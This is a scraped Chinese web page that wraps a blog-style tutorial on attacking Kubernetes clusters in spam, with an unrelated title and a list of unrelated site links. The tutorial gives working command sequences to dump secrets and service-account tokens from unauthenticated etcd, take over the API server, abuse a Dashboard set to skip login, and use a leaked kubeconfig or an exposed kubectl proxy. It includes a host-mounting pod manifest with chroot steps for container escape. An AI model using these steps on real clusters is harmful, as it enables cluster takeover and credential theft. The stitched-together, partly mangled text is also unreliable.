当前位置: 首页 > news >正文

做app的网站有哪些设计logo多少钱

做app的网站有哪些,设计logo多少钱,济南模板建站多少钱,企业网络安全管理制度和应急预案目录 云原生-K8s安全-etcd(Master-数据库)未授权访问 etcdV2版本利用 etcdV3版本利用 云原生-K8s安全-Dashboard(Master-web面板)未授权访问 云原生-K8s安全-Configfile鉴权文件泄漏 云原生-K8s安全-Kubectl Proxy不安全配置 知识点#xff1a; 1、云原生-K8s安全-etcd未…目录 云原生-K8s安全-etcd(Master-数据库)未授权访问 etcdV2版本利用 etcdV3版本利用 云原生-K8s安全-Dashboard(Master-web面板)未授权访问 云原生-K8s安全-Configfile鉴权文件泄漏 云原生-K8s安全-Kubectl Proxy不安全配置 知识点 1、云原生-K8s安全-etcd未授权访问 2、云原生-K8s安全-Dashboard未授权访问 3、云原生-K8s安全-Configfile鉴权文件泄漏 4、云原生-K8s安全-Kubectl Proxy不安全配置 云原生-K8s安全-etcd(Master-数据库)未授权访问 实战中不会常见利用条件比较苛刻。 默认通过证书认证起一个数据库作用。主要存放节点的数据如一些token和证书。 攻击23791端口 配置映射 /etc/kubernetes/manifests/etcd.yaml第一种(满足)在安装etcd时没有配置指定--client-cert-auth 参数打开证书校验暴露在外Etcd服务存在未授权访问风险。暴露外部可以访问直接未授权访问获取secrets和token利用 重启kubelet进程 systemctl restart kubelet第二种在打开证书校验选项后通过本地127.0.0.1:2379可免认证访问Etcd服务但通过其他地址访问要携带cert(证书)进行认证访问一般配合ssrf或其他利用较为鸡肋。只能本地访问直接未授权访问获取secrets和token利用 第三种(满足)实战中在安装k8s默认的配置2379只会监听本地(127.0.0.1)如果访问没设置0.0.0.0暴露那么也就意味着最多就是本地访问不能公网访问只能配合ssrf或其他。只能本地访问利用ssrf或其他进行获取secrets和token利用 复现搭建 https://www.cnblogs.com/qtzd/p/k8s_etcd.html 复现利用etcdV2/V3版本利用参考 https://www.cnblogs.com/qtzd/p/k8s_etcd.html https://www.wangan.com/p/7fy7f81f02d9563a 暴露etcd未授权-获取secretstoken-通过token访问API-Server接管 etcdV2版本利用 直接访问http://ip:2379/v2/keys/?recursivetrue 可以看到所有的key-value值。secrets token etcdV3版本利用 安装etcdctlhttps://github.com/etcd-io/etcd/releases 安装kubectlhttps://kubernetes.io/zh-cn/docs/tasks/tools/install-kubectl-linux 1、连接提交测试 ./etcdctl --endpoints192.168.139.136:23791 get / --prefix./etcdctl --endpoints192.168.139.136:23791 put /testdir/testkey1 Hello world1./etcdctl -- endpoints192.168.139.136:23791 put /testdir/testkey2 Hello world2 ./etcdctl -- endpoints192.168.139.136:23791 put /testdir/testkey3 Hello world32、获取k8s的secrets ./etcdctl --endpoints192.168.139.136:23791 get / --prefix --keys-only | grep /secrets/3、读取service account token ./etcdctl --endpoints192.168.139.136:23791 get / --prefix --keys-only | grep /secrets/kube-system/clusterrole./etcdctl --endpoints192.168.139.136:23791 get /registry/secrets/kube-system/clusterrole-aggregation-controller-token-jdp5z4、通过token访问API-Server获取集群的权限 kubectl --insecure-skip-tls-verify -s https://127.0.0.1:6443/ --tokeney... -n kube-system get podsSSRF解决限制访问-获取secretstoken-通过token访问API-Server接管 云原生-K8s安全-Dashboard(Master-web面板)未授权访问 默认端口8001(一般会被映射成别的端口) 配置不当导致dashboard未授权访问,通过dashboard我们可以控制整个集群。 kubernetes dashboard的未授权其实分两种情况 一种是在本身就存在着不需要登录的http接口但接口本身并不会暴露出来如接口被暴露在外就会导致dashboard未授权。另外一种情况则是开发嫌登录麻烦修改了配置文件使得安全接口https的dashboard页面可以跳过登录。 复现利用 前提条件 用户开启enable-skip-login时可以在登录界面点击跳过登录进dashboardKubernetes-dashboard绑定cluster-admin拥有管理集群的最高权限) 1、安装 https://blog.csdn.net/justlpf/article/details/130718774 2、启动 kubectl create -f recommended.yaml 3、卸载 kubectl delete -f recommended.yaml4、查看状态 kubectl get pod,svc -n kubernetes-dashboard5、利用新增Pod后续同前面利用一致 apiVersion: v1 kind: Pod metadata:name: xiaodisec spec:containers:- image: nginxname: xiaodisecvolumeMounts:- mountPath: /mntname: test-volumevolumes:- name: test-volumehostPath:path: /找到暴露面板-dashboard跳过-创建或上传pod-进入pod执行-利用挂载逃逸   云原生-K8s安全-Configfile鉴权文件泄漏 攻击者通过Webshell、Github等拿到了K8s配置的Config文件操作集群从而接管所有容器。 K8s configfile作为K8s集群的管理凭证其中包含有关K8s集群的详细信息(API Server、登录凭证)。 如果攻击者能够访问到此文件(如办公网员工机器入侵、泄露到Github的代码等)就可以直接通过API Server接管K8s集群带来风险隐患。用户凭证保存 在kubeconfig文件中通过以下顺序来找到kubeconfig文件 如果提供了--kubeconfig参数就使用提供的kubeconfig文件如果没有提供--kubeconfig参数但设置了环境变量$KUBECONFIG则使用该环境变量提供的kubeconfig文件如果以上两种情况都没有kubectl就使用默认的kubeconfig文件~/.kube/config 复现利用K8s-configfile-创建Pod/挂载主机路径-Kubectl进入容器-利用挂载逃逸 1、将获取到的config复制 2、安装kubectl使用config连接 安装kubectlhttps://kubernetes.io/zh-cn/docs/tasks/tools/install-kubectl-linux 连接 kubectl -s https://192.168.139.130:6443/ --kubeconfigconfig --insecure-skip-tls-verifytrue get nodes3、上传利用test.yaml创建pod kubectl apply -f test.yaml -n default --kubeconfigconfig4、连接pod后进行容器挂载逃逸 kubectl exec -it xiaodisec bash -n default --kubeconfigconfigcd /mnt chroot . bash云原生-K8s安全-Kubectl Proxy不安全配置 当运维人员需要某个环境暴露端口或者IP时会用到Kubectl Proxy 使用kubectl proxy命令就可以使API server监听在本地的xxxx端口上 环境搭建 kubectl --insecure-skip-tls-verify proxy --accept-hosts^.*$ --address0.0.0.0 --port8009 复现利用类似某个不需认证的服务应用只能本地访问被代理出去后形成了外部攻击入口点。 找到暴露入口点根据类型选择合适方案 kubectl -s http://192.168.139.130:8009 get pods -n kube-system
http://www.hkea.cn/news/14466654/

相关文章:

  • 宣传网站怎么做的保定网站建设多少钱
  • 做h的游戏 迅雷下载网站wordpress主题不显示图片
  • 泉州建设网站公司WordPress字库压缩
  • 建设工程监理考试网站中江建设局网站
  • 如今做那个网站致富网站打开速度与服务器
  • 没有域名怎么访问网站360建网站好不好?
  • 为什么一个网站做中英文双语版网站更换空间教程
  • 企业手机网站建设新闻微信积分商城
  • 图书馆网站建设情况汇报wordpress 编辑器标签
  • 庆网站建设做网站有免费的服务器吗
  • 企业微信网站开发文档wordpress首页出现恶意链接
  • 高校门户网站的建设方案网站建设开发公司有哪些
  • 盐城做网站哪家好阿里云域名注册流程
  • 企业网站都是静态的吗装饰公司如何拉客户
  • 域名注册最后是网站网站运营数据周报表怎么做
  • 网页设计好的网站注册公司有什么风险吗
  • 石家庄网站建设外包公司哪家好西安建设工程信息网的地址
  • 海口建设网站的公司手机3d动画制作软件
  • 凡科做网站好吗做营销网站推广
  • 射阳建设网站网站开发的技术路线是什么
  • 公司展示网站制作网络营销现状分析
  • 海南房地产网站企业为什么要开发网址
  • 苏州大学网站建设网站搜索引擎优化建议
  • 青岛网站运营推广企业网站怎样做外链方法
  • 免费网站部署山东网站优化公司
  • 静态网站 价格网站的根目录怎么找
  • 网站开发属于什么资产酒店宾馆型网站开发
  • 从您的角度来看_对于农产品网站的建设有什么想法或建议呢?做薆视频网站
  • 怎样学做企业网站wordpress提成插件
  • 网站建设常州麦策电商嘉兴网站建设嘉兴